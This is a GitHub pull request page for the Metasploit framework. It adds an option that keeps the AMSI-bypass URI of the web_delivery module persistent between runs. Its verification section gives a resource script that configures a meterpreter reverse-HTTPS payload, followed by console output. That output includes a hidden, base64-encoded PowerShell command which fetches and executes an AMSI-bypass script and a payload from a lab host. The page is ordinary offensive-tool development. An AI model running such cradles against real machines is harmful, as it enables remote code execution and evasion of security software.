Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add PSH-AmsiBypassURI option to allow persistent web_delivery #13063

Merged
merged 1 commit into from Mar 13, 2020

Conversation

@timwr
Copy link
Contributor

timwr commented Mar 12, 2020

This change adds a PSH-AmsiBypassURI option that allows web_delivery to be persistent between runs.
Fixes #13046

Verification

$ cat winweb.rc
use exploit/multi/script/web_delivery
set SRVHOST 192.168.56.1
set LHOST 192.168.56.1
set LPORT 4444
set target 2
set URIPATH /uri
set PSH-AmsiBypassURI /amsi_get_out_of_my_way
set SSL true
set payload windows/x64/meterpreter/reverse_https
# not sure if these are needed
set AutoLoadStdapi false
set AutoVerifySession false
set AutoSystemInfo false

exploit

$ ./msfconsole -qr winweb.rc
[*] Processing winweb.rc for ERB directives.
resource (winweb.rc)> use exploit/multi/script/web_delivery
resource (winweb.rc)> set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
resource (winweb.rc)> set LHOST 192.168.56.1
LHOST => 192.168.56.1
resource (winweb.rc)> set LPORT 4444
LPORT => 4444
resource (winweb.rc)> set target 2
target => 2
resource (winweb.rc)> set URIPATH /uri
URIPATH => /uri
resource (winweb.rc)> set PSH-AmsiBypassURI /amsi_get_out_of_my_way
PSH-AmsiBypassURI => /amsi_get_out_of_my_way
resource (winweb.rc)> set SSL true
SSL => true
resource (winweb.rc)> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (winweb.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (winweb.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) >
[*] Started HTTPS reverse handler on https://192.168.56.1:4444
[*] Using URL: https://192.168.56.1:8080/uri
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAEIALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABCAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQA6ADgAMAA4ADAALwB1AHIAaQAvAGEAbQBzAGkAXwBnAGUAdABfAG8AdQB0AF8AbwBmAF8AbQB5AF8AdwBhAHkAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAOgA4ADAAOAAwAC8AdQByAGkAJwApACkAOwA=

Verify:

  • The powershell command is the same each time you run the script
  • 馃悮 (don't forget to meterpreter > load stdapi)
@bwatters-r7 bwatters-r7 self-assigned this Mar 13, 2020
@bwatters-r7 bwatters-r7 merged commit c21b90e into rapid7:master Mar 13, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

bwatters-r7 commented Mar 13, 2020

Release notes

This PR fixes an issue where persistence was not well-supported by the powershell amsi bypass option.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

3 participants
You can鈥檛 perform that action at this time.